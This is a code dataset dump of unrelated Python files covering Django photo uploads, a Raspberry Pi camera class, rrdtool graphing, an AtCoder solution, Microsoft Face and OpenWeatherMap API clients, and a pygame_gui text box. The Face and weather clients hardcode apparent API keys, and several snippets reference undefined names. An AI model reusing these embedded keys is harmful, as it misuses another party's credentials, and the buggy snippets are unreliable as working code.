self.length_block1_1b = update[\"Lengthblock1\"]\n self.min_lin_dim_2b = update[\"MinlindimmA\"]\n self.digital_dim_freq_2b = update[\"DigdimfreqHz\"]\n self.vf_short_threshold_fast = update[\"Vftresholdfast\"]\n self.vf_short_threshold_slow = update[\"Vfthresholdslow\"]\n self.min_on_time_2b = update[\"Minontimens\"]\n self.nominal_voltage_2b = update[\"Nomvoltagex10mV\"]\n self.load_type_1b = update[\"Loadtype\"]\n self.ak_power_1window_1b = update[\"AKpower1winW\"]\n self.ak_power_2window_1b = update[\"AKpower2winW\"]\n self.dual_mon_1b = update[\"Dualmonitoring\"]\n","sub_path":"koenvs_home/apps/params/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":25733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"71929286","text":"import time\nimport zipfile\n\nfrom .models import GalleryImage\n\ndef process_upload(photo_list, form, user, status=''):\n \"\"\"\n Helper function that actually processes and saves the upload(s).\n Segregated out for readability.\n \"\"\"\n caption = contact_address = contact_city = contact_phone = ''\n status += \"beginning upload processing. Gathering and normalizing fields....<br>\"\n\n for upload_file in photo_list:\n upload_file.name = upload_file.name.lower().replace(' ', '_') # lowercase and replace spaces\n upload_name = upload_file.name\n\n status += \"File is %s. Checking for single file upload or bulk upload... <br>\" % upload_name\n if upload_name.endswith('.jpg') or upload_name.endswith('.jpeg'):\n status += \"Found jpg. Attempting to save... <br>\"\n # to do: proper dupe checking\n dupe = False\n if not dupe:\n upload = Upload(\n gallery_form = controller,\n sender_name = form.cleaned_data['name'],\n sender_email = form.cleaned_data['from_address'],\n photo = upload_file,\n contact_address = contact_address,\n caption = caption\n )\n upload.save()\n time.sleep(1)\n status += \"Saved and uploaded jpg.\"\n #except Exception, inst:\n # status += \"Error saving image: %s\" % (inst)\n\n elif upload_name.endswith('.zip'):\n \"\"\"\n We're going to do a bulk upload.\n For reference, see the gallery app or\n http://code.google.com/p/django-photologue/source/browse/trunk/photologue/models.py#194\n Also note use of custom storage. See: http://docs.djangoproject.com/en/dev/topics/files/\n \"\"\"\n status += \"Found zip. Attempting to process. <br>\"\n from django.core.files.base import ContentFile\n from cStringIO import StringIO\n\n working_zip = zipfile.ZipFile(upload_file)\n status += \"have working zip. Filelist is %s <br>\" % str(working_zip.namelist())\n bad_file = working_zip.testzip()\n if bad_file:\n status += '\"%s\" in the .zip archive is corrupt.<br>' % bad_file\n raise Exception('\"%s\" in the .zip archive is corrupt.' % bad_file)\n\n for filename in working_zip.namelist():\n if filename.startswith('__'): # do not process meta files\n continue\n if not filename.lower().endswith('.jpg'): # bail if it's not jpg\n continue\n status += \"beginning processing %s ... \" % filename\n\n data = working_zip.read(filename)\n if len(data):\n status += \"we have data. Attempting to test for validity <br> \"\n # test for truncated and broken images\n try:\n trial_image = Image.open(StringIO(data))\n trial_image.load()\n except Exception:\n continue\n filename = filename.replace(' ','_').replace('#','').replace('/','_')\n # test for dupes\n try:\n full_filename = 'uploaded/%s/%s/%s' % (datetime.datetime.today().year, controller.slug, filename)\n dupe = Upload.objects.get(photo=full_filename, controller=controller)\n except:\n if not ContentFile(data):\n return filename \n path = SimpleUploadedFile('uploaded/'+filename, data)\n upload = Upload(\n gallery_form = controller,\n sender_name = form.cleaned_data['name'],\n photo = path,\n caption = caption, \n )\n if faces:\n upload.sellable = True\n upload.faces = True\n upload.save()\n time.sleep(.5) # give a little breathing room for the server \n working_zip.close()\n status += \"bulk upload completed\"\n return status\n","sub_path":"photos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"518256009","text":"#!/usr/bin/env python3\n\nfrom picamera import PiCamera\nimport time\nimport datetime\nimport os\n\nclass PicamImpl:\n\n # Capture modes\n RAW_BAYER = 1\n MAX_RES = 2\n CONSISTENT = 3\n CUSTOM = 4\n\n def __init__(self, capture_mode=RAW_BAYER, root_dir='data', res_w=4056, res_h=3040, framerate=30, iso=100):\n self.capture_mode = capture_mode\n self.camera = PiCamera()\n self._init_parameters(res_w=res_w, res_h=res_h, framerate=framerate, iso=iso)\n self.set_save_directory(root_dir=root_dir)\n time.sleep(2)\n print(\"Camera ready\")\n\n def _init_parameters(self, override=False, **params):\n self.camera.resolution = (4056, 3040)\n self.camera.framerate = 30\n self.camera.iso = 100\n\n if self.capture_mode == self.CUSTOM or override:\n if 'res_w' in params.keys() and 'res_h' in params.keys():\n self.camera.resolution = (params['res_w'], params['res_h'])\n if 'framerate' in params.keys():\n self.camera.framerate = params['framerate']\n if 'iso' in params.keys():\n self.camera.iso = params['iso']\n \n if self.capture_mode == self.RAW_BAYER:\n self.bayer = True\n else: \n self.bayer = False\n\n if self.capture_mode == self.CONSISTENT:\n self.camera.shutter_speed = self.camera.exposure_speed\n self.camera.exposure_mode = 'off'\n g = self.camera.awb_gains\n self.camera.awb_mode = 'off'\n self.camera.awb_gains = g\n \n def set_save_directory(self, *dir_levels, root_dir='data'):\n dir_path = os.environ['PICAMERA_ROOT']\n datestamp = datetime.datetime.now().strftime(\"%Y_%m_%d\")\n self.save_dir = os.path.join(dir_path, root_dir, datestamp) + '/'\n if len(dir_levels) > 0:\n self.save_dir += '/'.join(dir_levels)+'/'\n if not os.path.exists(self.save_dir):\n os.makedirs(self.save_dir)\n print(\"Setting save directory to %s\" % self.save_dir)\n\n def capture_continuous(self):\n break_capture = False\n for filename in self.camera.capture_continuous(self.save_dir+'{timestamp:%Y-%m-%d-%H-%M-%f}.jpg'):\n print(\"Captured %s\" % filename)\n if break_capture:\n break\n\n def capture_single(self, root=None):\n datestamp = datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%f\")\n if root is not None:\n datestamp = str(root)+\"_\"+datestamp\n self.camera.capture(self.save_dir+datestamp+'.jpg', bayer=self.bayer)\n return datestamp\n \n def _filename_generator(self, duration):\n start = time.time()\n end = start+float(duration)\n cur = time.time()\n while cur < end:\n datestamp = datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%f\")\n yield self.save_dir+datestamp+'.jpg'\n cur = time.time()\n\n def capture_burst(self, duration):\n self._init_parameters(res_w=800, res_h=600, override=True)\n self.camera.capture_sequence(self._filename_generator(duration), use_video_port=True)\n self._init_parameters()\n\n def disconnect(self):\n self.camera.close()","sub_path":"picamera/picam_lib/picam_impl.py","file_name":"picam_impl.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"301249028","text":"import requests\nimport json\n\nclass TestRequest():\n\n def get_rates(self, basecurrency='USD'):\n url = 'https://api.exchangeratesapi.io/latest?base=%s' % basecurrency\n print(url)\n response = requests.get(url)\n return json.loads(response.text)\n\n\nif __name__ == '__main__':\n test_request = TestRequest()\n exchange_dict = test_request.get_rates()\n print(exchange_dict['rates'])\n for rate, value in exchange_dict['rates']:\n print(rate, value)\n","sub_path":"lancamento/external_apis.py","file_name":"external_apis.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"343052855","text":"\"\"\"\nFecha creacion: 23-09-2015\n\n@author: jjsalinas\n\npython3 - Clase colores para el manejo de estos en formato RGB y Hexadecimal\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport matplotlib.colors as colors\nimport numpy\n\"\"\"\nfunction: normalizar(v)\n Convierte el vector de formato RGB con valores en [0, 255]\n en un vector normalizado con valores en [0.0, 1.0]\n\"\"\"\ndef normalizar(v):\n res=[i/255 for i in v]\n return res\n\n\"\"\"\nfunction: normalizar(v)\n Convierte el vector de formato matplotlib color con valores en [0.0, 1.0]\n en un vector RGB con valores en [0, 255]\n\"\"\"\ndef desnormalizar(v):\n res=[int(255*i) for i in v]\n return res\n\n\n\"\"\"\nClase colores\n@valores - array con los tres valores del color en RGB\n@vhex - string con el valor Hexadecimal del color\n\"\"\"\nclass colores:\n def __init__(self, vals=None, valHex=None):\n if vals==None and valHex==None:\n self.valores=[255,255,255]\n self.vhex='#ffffff'\n elif vals!=None:\n self.valores=vals[:]\n #rgb2hex devuelve string hex, entrada 3-tupla con valores en [0.0-1.0]\n self.vhex=colors.rgb2hex(normalizar(self.valores))\n elif valHex!=None:\n self.vhex=valHex;\n #hex2color, entrada string val hexadecimal, devuele tupla ([0.0-1.0], [0.0-1.0], [0.0-1.0])\n self.valores=desnormalizar(colors.hex2color(self.vhex)) #llamada a desnormalizar para tener vector RGB con vals 0-255\n \n def setValores(self, vals):\n self.valores=vals[:]\n self.vhex=colors.rgb2hex(normalizar(self.valores))\n\n def setVHex(self, valHex):\n self.vhex=valHex;\n self.valores=desnormalizar(colors.hex2color(self.vhex))\n\n def getValores(self):\n return self.valores\n\n def getVHex(self):\n return self.vhex\n \n #Dibuja un cuadrado con matplotlib del color actual de la instancia\n def pintaCuadro(self):\n if sum(self.valores)/3<125:\n ctexto='#ffffff'\n else:\n ctexto='#000000'\n fig1 = plt.figure()\n ax1 = fig1.add_subplot(111, aspect='equal')\n ax1.add_patch(\n patches.Rectangle(\n (0.0, 0.0), # (x,y)\n 1.0, # width\n 1.0, # height\n facecolor=self.vhex\n )\n )\n left, width = .25, .5\n bottom, height = .25, .5\n right = left + width\n top = bottom + height\n ax1.text(top, right, self.vhex,\n horizontalalignment='center',\n verticalalignment='center',\n fontsize=20, color=ctexto,\n transform=ax1.transAxes)\n \n #fig1.savefig('rect1.png', dpi=90, bbox_inches='tight')\n fig1.show()\n \n #Metodo que a partir del color contenido en la instancia\n #genera una serie de colores de tamaño dado n, de forma que cada color\n #tiene proporcion phi con el anterior de la serie\n #Devuelve una tupla lista_objetos_colores, lista_valor_hex_colores\n def serie(self, n): \n phi=(1+numpy.sqrt(5))/2\n cbase=self.vhex\n #v=desnormalizar(colors.hex2color((cbase)))\n v=self.valores[:]\n\n color1=colores(valHex=cbase)\n \n vcols=[color1]\n vh=[color1.getVHex()]\n \n vphi=v[:]\n for i in range(9):\n vphi=[int(c*phi)%255 for c in vphi]\n colorphi=colores(vphi)\n vcols.append(colorphi)\n vh.append(colorphi.getVHex())\n return vcols, vh\n #paleta(vh, 10)\n \n#*****************************************************************************#\n#*****************************************************************************#\n#*****************************************************************************#\n\n#Dibuja una paleta de 5 o 10 colores a partir de valores hexadecimales\ndef paleta(lcols_hex, l=5):\n if l==5:\n assert(len(lcols_hex)==5)\n x=0.2\n elif l==10:\n assert(len(lcols_hex)==10)\n x=0.1\n else:\n return \"2nd argumento debe ser =5 o =10\"\n \n fig1 = plt.figure()\n ax1 = fig1.add_subplot(111, aspect='equal')\n \n for i in range(l):\n ax1.add_patch(\n patches.Rectangle(\n (x*i, 0.0), # (x,y)\n x, # width\n 1.0, # height\n facecolor=lcols_hex[i]\n ) \n )\n fig1.show()\n\n","sub_path":"colores.py","file_name":"colores.py","file_ext":"py","file_size_in_byte":4451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"584803727","text":"import subprocess\nimport re\nimport os.path\nimport rrdtool\n\ndestinations = {}\n\nif __name__ == \"__main__\":\n\n # Scrape pmacct stats\n out = subprocess.check_output(\"/usr/local/bin/pmacct -s\", shell=True)\n for row in out.split('\\n'):\n if 'DST_IP' in row:\n continue\n try:\n line = re.sub(' +',' ',row).split(' ')\n ipaddr = line[0]\n packets = line[1]\n nbytes = line[2]\n #print \"IP: {0} PACKETS: {1} BYTES: {2}\".format(ipaddr, packets, nbytes)\n destinations[ipaddr] = packets, nbytes\n except:\n break\n\n # Generate graphs\n for dst in destinations:\n # This cuts the cruft off the end of the pmacct output\n rrdfile = '{0}.rrd'.format(dst)\n pngfile = '{0}.png'.format(dst)\n rrdfileescaped = '{0}.rrd'.format(dst).replace(':', '\\\\:')\n \n #print \"GENERATING file {0} FROM {1}\".format(pngfile, rrdfile)\n if not os.path.exists('{0}'.format(rrdfile)):\n continue\n\n ret = rrdtool.graph('{0}'.format(pngfile), '--start', 'end-36h', '--vertical-label=Bits/s',\n '--title', dst, '--width', '600', '--height', '120',\n 'DEF:bits={0}:bits:LAST'.format(rrdfileescaped),\n 'CDEF:octets=bits,8,*',\n 'AREA:octets#66FF00:Inbound')\n","sub_path":"pmgraph.py","file_name":"pmgraph.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"525364965","text":"\"\"\"B - Toll Gates\nhttps://atcoder.jp/contests/abc094/tasks/abc094_b\nN M X\nA_1 A_2 ... A_M\n\n>>> main(5, 3, 3, [1, 2, 4])\n1\n>>> main(7, 3, 2, [4, 5, 6])\n0\n>>> main(10, 7, 5, [1, 2, 3, 4, 6, 8, 9])\n3\n\"\"\"\n\n\ndef main(n, m, x, a):\n line = [0 for _ in range(n)]\n\n for a in a:\n line[a - 1] = 1\n\n to_left = sum(line[x - 1 :])\n to_right = sum(line[x - 1 :: -1])\n\n print(min(to_left, to_right))\n\n\nif __name__ == \"__main__\":\n n, m, x = map(int, input().split())\n a = list(map(int, input().split()))\n\n main(n, m, x, a)\n","sub_path":"abc/abc094/abc094_b.py","file_name":"abc094_b.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"27202009","text":"import cognitive_face as CF\n\nimport json\n\nimport operator\n\n#Key = \"dcc841a853e948acb93d131f00afcb34\"\nKey = \"15d101488ccd49f0aa7735ca0a022a8a\"\nCF.Key.set(Key)\n\nemotions = [\"Anger\", \"Contempt\", \"Disgust\", \"Fear\", \"Happiness\", \"Neutral\", \"Sadness\", \"Surprise\"]\n\ndef getResponse(img_url):\n data = {}\n\n resp = None\n try:\n print (\"In MS: \" + \"Looking for \" + img_url)\n result = CF.face.detect(img_url, False, True, 'age,gender,emotion,headPose' )\n resp = json.loads(json.dumps(result))\n #\n print (resp)\n except Exception:\n print (\"Error invoking Microsoft Service\" + str(Exception))\n if resp:\n data[\"Anger\"] = resp[0][\"faceAttributes\"][\"emotion\"][\"anger\"]\n data[\"Contempt\"] = resp[0][\"faceAttributes\"][\"emotion\"][\"contempt\"]\n data[\"Disgust\"] = resp[0][\"faceAttributes\"][\"emotion\"][\"disgust\"]\n data[\"Fear\"] = resp[0][\"faceAttributes\"][\"emotion\"][\"fear\"]\n data[\"Happiness\"] = resp[0][\"faceAttributes\"][\"emotion\"][\"happiness\"]\n data[\"Neutral\"] = resp[0][\"faceAttributes\"][\"emotion\"][\"neutral\"]\n data[\"Sadness\"] = resp[0][\"faceAttributes\"][\"emotion\"][\"sadness\"]\n data[\"Surprise\"] = resp[0][\"faceAttributes\"][\"emotion\"][\"surprise\"]\n data[\"strongestEmotion\"] = max(data.items(), key=operator.itemgetter(1))[0]\n arr_list = getEmotionArray(data)\n data[\"class\"] = max(arr_list)\n data[\"gender\"] = resp[0][\"faceAttributes\"][\"gender\"]\n data[\"age\"] = resp[0][\"faceAttributes\"][\"age\"]\n\n data[\"right-pupil-x\"] = resp[0][\"faceLandmarks\"][\"pupilRight\"][\"x\"]\n data[\"right-pupil-y\"] = resp[0][\"faceLandmarks\"][\"pupilRight\"][\"y\"]\n data[\"left-pupil-x\"] = resp[0][\"faceLandmarks\"][\"pupilLeft\"][\"x\"]\n data[\"left-pupil-y\"] = resp[0][\"faceLandmarks\"][\"pupilLeft\"][\"y\"]\n data[\"yaw\"] = resp[0][\"faceAttributes\"][\"headPose\"][\"yaw\"]\n data[\"roll\"] = resp[0][\"faceAttributes\"][\"headPose\"][\"roll\"]\n data[\"pitch\"] = resp[0][\"faceAttributes\"][\"headPose\"][\"pitch\"]\n\n #print \"Data is: \" + str(data)\n return data\n\n\ndef getEmotionArray(data):\n listing = []\n listing.append(data[\"Anger\"])\n listing.append(data[\"Contempt\"])\n listing.append(data[\"Disgust\"])\n listing.append(data[\"Fear\"])\n listing.append(data[\"Happiness\"])\n listing.append(data[\"Neutral\"])\n listing.append(data[\"Sadness\"] )\n listing.append(data[\"Surprise\"] )\n\n return listing\n","sub_path":"Microsoft.py","file_name":"Microsoft.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"39922751","text":"import json\nimport requests\n\nOPENWEATHERMAP_API_KEY = \"55d79b326f3720654f6ab31b68231d4a\"\n\nclass WeatherInfo:\n def __init__(self,city_name, country, temp, wind_speed, wind_deg):\n self.city_name = city_name\n self.country = country\n self.temp_K = temp\n if self.temp_K is not None:\n self.temp_C = round(self.temp_K - 273, 2)\n else:\n self.temp_C = None\n self.wind_speed = wind_speed\n self.wind_deg = wind_deg\n\n @staticmethod\n def from_json(json_data):\n city_name = json_data['name']\n country_name = json_data ['sys']['country']\n temp = json_data['main']['temp']\n wind_speed = json_data['wind']['speed']\n wind_deg = json_data['wind']['deg']\n weather_info = WeatherInfo(\n city_name, country_name, temp, wind_speed, wind_deg\n )\n return weather_info\n\ndef get_weather_data(city_name):\n site_url = \"api.openweathermap.org/data/2.5/weather\"\n city = f\"q={city_name}\"\n app_id = f\"appid={OPENWEATHERMAP_API_KEY}\"\n\n\n url=f\"https://{site_url}?{city}&{app_id}\"\n response = requests.get(url)\n json_data = response.json()\n if json_data['cod'] !=200:\n weather_info = WeatherInfo(city_name, None, None, None, None)\n else:\n weather_info = WeatherInfo.from_json(json_data)\n return weather_info\n\n\nif __name__ == '__main__':\n weather_data = get_weather_data(\"London\") # nimmt immer Stadt mit höchster Einwohnerzahl\n\n print(f\"Weather in {weather_data.city_name}\")\n print(f\"Windspeed {weather_data.wind_speed}\")\n print(f\"Wind direction {weather_data.wind_deg}°\")\n print (f\"Temperature {weather_data.temp_K} K ({weather_data.temp_C} °C)\")","sub_path":"Flask/json_main.py","file_name":"json_main.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"184299816","text":"import pygame\nimport warnings\nimport math\n\nfrom typing import Union, Tuple\n\nfrom pygame_gui import ui_manager\nfrom pygame_gui.core import ui_container\nfrom pygame_gui.core.ui_element import UIElement\nfrom pygame_gui.elements.ui_vertical_scroll_bar import UIVerticalScrollBar\n\nfrom pygame_gui.elements.text.html_parser import TextHTMLParser\nfrom pygame_gui.elements.text.text_effects import TypingAppearEffect, FadeInEffect, FadeOutEffect\nfrom pygame_gui.core.drawable_shapes import RectDrawableShape, RoundedRectangleShape\nfrom pygame_gui.core.ui_appearance_theme import ColourGradient\n\n\nclass UITextBox(UIElement):\n \"\"\"\n A Text Box element lets us display word-wrapped, formatted text. If the text to display is longer than the height\n of the box given then the element will automatically create a vertical scroll bar so that all the text can be seen.\n\n Formatting the text is done via a subset of HTML tags. Currently supported tags are:\n\n - <b></b> or <strong></strong> - to encase bold styled text.\n - <i></i>, <em></em> or <var></var> - to encase italic styled text.\n - <u></u> - to encase underlined text.\n - <a href='id'></a> - to encase 'link' text that can be clicked on to generate events with the id given in href.\n - <body bgcolor='#FFFFFF'></body> - to change the background colour of encased text.\n - <br> - to start a new line.\n - <font face='verdana' color='#000000' size=3.5></font> - To set the font, colour and size of encased text.\n\n More may be added in the future if needed or frequently requested.\n\n NOTE: if dimensions of the initial containing rect are set to -1 the text box will match the final dimension to\n whatever the text rendering produces. This lets us make dynamically sized text boxes depending on their contents.\n\n\n :param html_text: The HTML formatted text to display in this text box.\n :param relative_rect: The 'visible area' rectangle, positioned relative to it's container.\n :param manager: The UIManager that manages this element.\n :param wrap_to_height: False by default, if set to True the box will increase in height to match the text within.\n :param layer_starting_height: Sets the height, above it's container, to start placing the text box at.\n :param container: The container that this element is within. If set to None will be the root window's container.\n :param parent_element: The element this element 'belongs to' in the theming hierarchy.\n :param object_id: A custom defined ID for fine tuning of theming.\n \"\"\"\n\n def __init__(self, html_text: str,\n relative_rect: pygame.Rect,\n manager: ui_manager.UIManager,\n wrap_to_height: bool = False,\n layer_starting_height: int = 1,\n container: ui_container.UIContainer = None,\n parent_element: UIElement = None,\n object_id: Union[str, None] = None):\n\n new_element_ids, new_object_ids = self.create_valid_ids(parent_element=parent_element,\n object_id=object_id,\n element_id='text_box')\n super().__init__(relative_rect, manager, container,\n starting_height=layer_starting_height,\n layer_thickness=1,\n element_ids=new_element_ids,\n object_ids=new_object_ids\n )\n self.html_text = html_text\n self.font_dict = self.ui_theme.get_font_dictionary()\n\n self.wrap_to_height = wrap_to_height\n self.link_hover_chunks = [] # container for any link chunks we have\n\n self.active_text_effect = None\n self.scroll_bar = None\n self.scroll_bar_width = 20\n\n self.border_width = None\n self.shadow_width = None\n self.padding = None\n self.background_colour = None\n self.border_colour = None\n\n self.link_normal_colour = None\n self.link_hover_colour = None\n self.link_selected_colour = None\n self.link_normal_underline = False\n self.link_hover_underline = True\n self.link_style = None\n\n self.rounded_corner_offset = None\n self.formatted_text_block = None # TextLine()\n self.text_wrap_rect = None\n self.background_surf = None\n\n self.drawable_shape = None\n self.shape_type = 'rectangle'\n self.shape_corner_radius = None\n\n self.rebuild_from_changed_theme_data()\n\n def rebuild(self):\n \"\"\"\n Rebuild whatever needs building.\n\n \"\"\"\n ''' The text_wrap_area is the part of the text box that we try to keep the text inside of so that none \n of it overlaps. Essentially we start with the containing box, subtract the border, then subtract \n the padding, then if necessary subtract the width of the scroll bar'''\n self.rounded_corner_offset = int(self.shape_corner_radius - (math.sin(math.pi/4) * self.shape_corner_radius))\n self.text_wrap_rect = [(self.rect[0] + self.padding[0] + self.border_width +\n self.shadow_width + self.rounded_corner_offset),\n (self.rect[1] + self.padding[1] + self.border_width +\n self.shadow_width + self.rounded_corner_offset),\n (self.rect[2] - (self.padding[0] * 2) - (self.border_width * 2) -\n (self.shadow_width * 2) - (2 * self.rounded_corner_offset)),\n (self.rect[3] - (self.padding[1] * 2) - (self.border_width * 2) -\n (self.shadow_width * 2) - (2 * self.rounded_corner_offset))]\n if self.rect[3] == -1:\n self.text_wrap_rect[3] = -1\n\n self.parse_html_into_style_data() # This gives us the height of the text at the 'width' of the text_wrap_area\n if self.formatted_text_block is not None:\n if self.wrap_to_height or self.rect[3] == -1:\n final_text_area_size = self.formatted_text_block.final_dimensions\n self.rect.size = [(final_text_area_size[0] + (self.padding[0] * 2) +\n (self.border_width * 2) + (self.shadow_width * 2) +\n (2 * self.rounded_corner_offset)),\n (final_text_area_size[1] + (self.padding[1] * 2) +\n (self.border_width * 2) + (self.shadow_width * 2) +\n (2 * self.rounded_corner_offset))]\n\n elif self.formatted_text_block.final_dimensions[1] > self.text_wrap_rect[3]:\n # We need a scrollbar because our text is longer than the space we have to display it.\n # this also means we need to parse the text again.\n text_rect_width = (self.rect[2] - (self.padding[0] * 2) - (self.border_width * 2) -\n (self.shadow_width * 2) - self.rounded_corner_offset - self.scroll_bar_width)\n self.text_wrap_rect = [(self.rect[0] + self.padding[0] + self.border_width +\n self.shadow_width + self.rounded_corner_offset),\n (self.rect[1] + self.padding[1] + self.border_width +\n self.shadow_width + self.rounded_corner_offset),\n text_rect_width,\n (self.rect[3] - (self.padding[1] * 2) - (self.border_width * 2) -\n (self.shadow_width * 2) - (2 * self.rounded_corner_offset))]\n self.parse_html_into_style_data()\n percentage_visible = self.text_wrap_rect[3] / self.formatted_text_block.final_dimensions[1]\n scroll_bar_position = (self.relative_rect.right - self.border_width -\n self.shadow_width - self.scroll_bar_width,\n self.relative_rect.top + self.border_width +\n self.shadow_width)\n\n if self.scroll_bar is not None:\n self.scroll_bar.kill()\n self.scroll_bar = UIVerticalScrollBar(pygame.Rect(scroll_bar_position,\n (self.scroll_bar_width,\n self.rect.height - (2 * self.border_width) -\n (2 * self.shadow_width))),\n percentage_visible,\n self.ui_manager,\n self.ui_container,\n parent_element=self)\n else:\n self.rect.size = [self.rect[2], self.rect[3]]\n\n theming_parameters = {'normal_bg': self.background_colour,\n 'normal_border': self.border_colour,\n 'border_width': self.border_width,\n 'shadow_width': self.shadow_width,\n 'shape_corner_radius': self.shape_corner_radius}\n\n if self.shape_type == 'rectangle':\n self.drawable_shape = RectDrawableShape(self.rect, theming_parameters,\n ['normal'], self.ui_manager)\n elif self.shape_type == 'rounded_rectangle':\n self.drawable_shape = RoundedRectangleShape(self.rect, theming_parameters,\n ['normal'], self.ui_manager)\n\n self.background_surf = self.drawable_shape.get_surface('normal')\n\n if self.scroll_bar is not None:\n height_adjustment = self.scroll_bar.start_percentage * self.formatted_text_block.final_dimensions[1]\n else:\n height_adjustment = 0\n\n drawable_area = pygame.Rect((0, height_adjustment), (self.text_wrap_rect[2], self.text_wrap_rect[3]))\n self.image = pygame.Surface(self.rect.size, flags=pygame.SRCALPHA)\n self.image.fill(pygame.Color(0, 0, 0, 0))\n self.image.blit(self.background_surf, (0, 0))\n self.image.blit(self.formatted_text_block.block_sprite, (self.padding[0] + self.border_width +\n self.shadow_width + self.rounded_corner_offset,\n self.padding[1] + self.border_width +\n self.shadow_width + self.rounded_corner_offset),\n drawable_area)\n\n self.formatted_text_block.add_chunks_to_hover_group(self.link_hover_chunks)\n\n def update(self, time_delta: float):\n \"\"\"\n Called once every update loop of the UI Manager. Used to react to scroll bar movement (if there is one),\n update the text effect (if there is one) and check if we are hovering over any text links (if there are any).\n\n :param time_delta: The time in seconds between calls to update. Useful for timing things.\n \"\"\"\n if self.alive():\n if self.scroll_bar is not None:\n if self.scroll_bar.check_has_moved_recently():\n height_adjustment = self.scroll_bar.start_percentage * self.formatted_text_block.final_dimensions[1]\n drawable_area = pygame.Rect((0, height_adjustment),\n (self.text_wrap_rect[2], self.text_wrap_rect[3]))\n self.image = pygame.Surface(self.rect.size, flags=pygame.SRCALPHA)\n self.image.fill(pygame.Color(0, 0, 0, 0))\n self.image.blit(self.background_surf, (0, 0))\n self.image.blit(self.formatted_text_block.block_sprite, (self.padding[0] + self.border_width +\n self.shadow_width +\n self.rounded_corner_offset,\n self.padding[1] + self.border_width +\n self.shadow_width +\n self.rounded_corner_offset),\n drawable_area)\n\n mouse_x, mouse_y = pygame.mouse.get_pos()\n should_redraw_from_chunks = False\n\n if self.scroll_bar is not None:\n height_adjustment = self.scroll_bar.start_percentage * self.formatted_text_block.final_dimensions[1]\n else:\n height_adjustment = 0\n base_x = (self.rect[0] + self.padding[0] + self.border_width +\n self.shadow_width + self.rounded_corner_offset)\n base_y = (self.rect[1] + self.padding[1] + self.border_width +\n self.shadow_width + self.rounded_corner_offset - height_adjustment)\n\n for chunk in self.link_hover_chunks:\n hovered_currently = False\n\n hover_rect = pygame.Rect((base_x + chunk.rect.x,\n base_y + chunk.rect.y),\n chunk.rect.size)\n if hover_rect.collidepoint(mouse_x, mouse_y):\n if self.rect.collidepoint(mouse_x, mouse_y):\n hovered_currently = True\n if chunk.is_hovered and not hovered_currently:\n chunk.on_unhovered()\n should_redraw_from_chunks = True\n elif hovered_currently and not chunk.is_hovered:\n chunk.on_hovered()\n should_redraw_from_chunks = True\n\n if should_redraw_from_chunks:\n self.redraw_from_chunks()\n\n if self.active_text_effect is not None:\n self.active_text_effect.update(time_delta)\n if self.active_text_effect.should_full_redraw():\n self.full_redraw()\n if self.active_text_effect.should_redraw_from_chunks():\n self.redraw_from_chunks()\n\n def update_containing_rect_position(self):\n \"\"\"\n Sets the final screen position of this element based on the position of it's container and it's relative\n position inside that container.\n \"\"\"\n self.rect = pygame.Rect((self.ui_container.rect.x + self.relative_rect.x,\n self.ui_container.rect.y + self.relative_rect.y),\n self.relative_rect.size)\n\n # for chunk in self.link_hover_chunks:\n # chunk.rect = pygame.Rect((self.ui_container.rect.x + self.relative_rect.x + chunk.rect.x,\n # self.ui_container.rect.y + self.relative_rect.y + chunk.rect.y),\n # chunk.rect.size)\n\n def set_relative_position(self, position: Union[pygame.math.Vector2, Tuple[int, int], Tuple[float, float]]):\n self.rect.x = self.ui_container.rect.x + position[0]\n self.rect.y = self.ui_container.rect.y + position[1]\n self.relative_rect.x = position[0]\n self.relative_rect.y = position[1]\n\n if self.scroll_bar is not None:\n scroll_bar_position = (self.relative_rect.right - self.border_width -\n self.shadow_width - self.scroll_bar_width,\n self.relative_rect.top + self.border_width +\n self.shadow_width)\n self.scroll_bar.set_relative_position(scroll_bar_position)\n\n def set_position(self, position: Union[pygame.math.Vector2, Tuple[int, int], Tuple[float, float]]):\n self.rect.x = position[0]\n self.rect.y = position[1]\n self.relative_rect.x = position[0] - self.ui_container.rect.x\n self.relative_rect.y = position[1] - self.ui_container.rect.y\n\n if self.scroll_bar is not None:\n scroll_bar_position = (self.relative_rect.right - self.border_width -\n self.shadow_width - self.scroll_bar_width,\n self.relative_rect.top + self.border_width +\n self.shadow_width)\n self.scroll_bar.set_relative_position(scroll_bar_position)\n\n def set_dimensions(self, dimensions: Union[pygame.math.Vector2, Tuple[int, int], Tuple[float, float]]):\n self.rect.width = dimensions[0]\n self.rect.height = dimensions[1]\n self.relative_rect.width = dimensions[0]\n self.relative_rect.height = dimensions[1]\n\n self.rebuild()\n\n def parse_html_into_style_data(self):\n \"\"\"\n Parses HTML styled string text into a format more useful for styling pygame.font rendered text.\n \"\"\"\n parser = TextHTMLParser(self.ui_theme, self.element_ids, self.object_ids)\n parser.push_style('body', {\"bg_color\": self.background_colour})\n parser.feed(self.html_text)\n\n self.formatted_text_block = TextBlock(parser.text_data,\n self.text_wrap_rect,\n parser.indexed_styles,\n self.font_dict,\n self.link_style,\n self.background_colour,\n self.wrap_to_height\n )\n\n def redraw_from_text_block(self):\n \"\"\"\n Redraws the final parts of the text box element that don't include redrawing the actual text. Useful if we've\n just moved the position of 